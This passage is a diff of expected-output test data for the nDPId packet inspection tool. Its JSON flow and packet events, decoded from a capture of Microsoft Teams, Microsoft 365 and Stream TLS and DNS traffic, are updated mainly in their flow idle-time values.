{"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01490{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2135,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041686889,"flow_last_seen":1587041686950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4662,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1587041686950,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","server_names":"login.microsoftonline.com,login.microsoftonline-p.com,loginex.microsoftonline.com,login2.microsoftonline.com,stamp2.login.microsoftonline-int.com,login.microsoftonline-int.com,loginex.microsoftonline-int.com,login2.microsoftonline-int.com,stamp2.login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"678aeaf909676262acfb913ccb78a126","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=stamp2.login.microsoftonline.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"7E:0F:A2:51:8F:FB:49:30:C3:34:07:5E:F8:7C:FD:34:20:A2:96:63"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687245,"flow_last_seen":1587041687245,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687245,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1587041687245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687245,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyRAbt4yq\/kAAAAALAC\/\/\/rWgAAAgQFtAEDAwUBAQgKMITA4AAAAAAEAgAA"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2193,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1587041687293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687293,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8EaVAAGwGudU0ck0hwKgBBgG77JHMBk4keMqv5aASIADnTgAAAgQFoAEDAwgEAggKYPR58TCEwOA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2194,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1587041687293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687293,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyRAbt4yq\/lzAZOJYAQEAkl0AAAAQEICjCEwQ9g9Hnx"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2195,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687245,"flow_last_seen":1587041687294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041687294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1587041687370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041687370,"pkt":"EBMx8Tl2KDc3AG3ICABFAABF06EAAP8RZK7AqAEGwKgBAdM1ADUAMUK+cAQBAAABAAAAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAE="} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -316,25 +316,25 @@ 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687382,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1587041687435,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1587041687435,"pkt":"KDc3AG3IEBMx8Tl2CABFAAD6rblAADkRD+LAqAEBwKgBBgA10zUA5gAAcASBgAABAAYAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAHADAAFAAEAAAe+AB8DYXBpBnN0cmVhbQ50cmFmZmljbWFuYWdlcgNuZXQAwDUABQABAAAAPAAJBmV1d2UtMcAMwGAABQABAAAEVQANCmV1d2UtMS1hcGnAQMB1AAUAAQAAACkACwhldXdlLTEtMcAMwI4ABQABAAAAwQApHWFtcy1ldXdlLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwE\/ApQABAAEAAAANAARoKLuX"} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041687435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.40.187.151"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687436,"flow_last_seen":1587041687436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687436,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1587041687436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687436,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVUrAqAEGaCi7l+ySAbtvi5oIAAAAALAC\/\/9njAAAAgQFtAEDAwUBAQgKMITBnAAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2203,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687466,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8OsBAAGwG7o1oKLuXwKgBBgG77JKBluUGb4uaCaASIADVGwAAAgQFoAEDAwgEAggKAbkbHzCEwZw="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2204,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687466,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVVbAqAEGaCi7l+ySAbtvi5oJgZblB4AQEAkTrwAAAQEICjCEwbkBuRsf"} -00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687436,"flow_last_seen":1587041687436,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687436,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1587041687436,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687436,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVUrAqAEGaCi7l+ySAbtvi5oIAAAAALAC\/\/9njAAAAgQFtAEDAwUBAQgKMITBnAAAAAAEAgAA"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2203,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1587041687466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687466,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8OsBAAGwG7o1oKLuXwKgBBgG77JKBluUGb4uaCaASIADVGwAAAgQFoAEDAwgEAggKAbkbHzCEwZw="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2204,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1587041687466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687466,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVVbAqAEGaCi7l+ySAbtvi5oJgZblB4AQEAkTrwAAAQEICjCEwbkBuRsf"} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041687611} 
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687600,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1587041687731,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1587041687731,"pkt":"EBMx8Tl2KDc3AG3ICABFAABM83AAAP8RRNjAqAEGwKgBAfUPADUAOAAFY+UBAAABAAAAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQAB"} 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"euno-1.api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1587041687745,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1587041687745,"pkt":"KDc3AG3IEBMx8Tl2CABFAADTPBBAADkRgbLAqAEBwKgBBgA19Q8AvwAAY+WBgAABAAQAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQABwAwABQABAAAGxQAfCmV1bm8tMS1hcGkOdHJhZmZpY21hbmFnZXIDbmV0AMA8AAUAAQAAABUACwhldW5vLTEtMcATwGcABQABAAAAOgApHWFtcy1ldW5vLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwFbAfgABAAEAAAAVAAQ0qbp3"} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.169.186.119"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687745,"flow_last_seen":1587041687745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1587041687745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGienAqAEGNKm6d+yTAbth0wzHAAAAALAC\/\/81+QAAAgQFtAEDAwUBAQgKMITCxwAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687789,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GLFAAGwGRTw0qbp3wKgBBgG77JMQ1B2QYdMMyKASIACACgAAAgQFoAEDAwgEAggKASJ3bTCEwsc="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGifXAqAEGNKm6d+yTAbth0wzIENQdkYAQEAm+kQAAAQEICjCEwvABIndt"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": 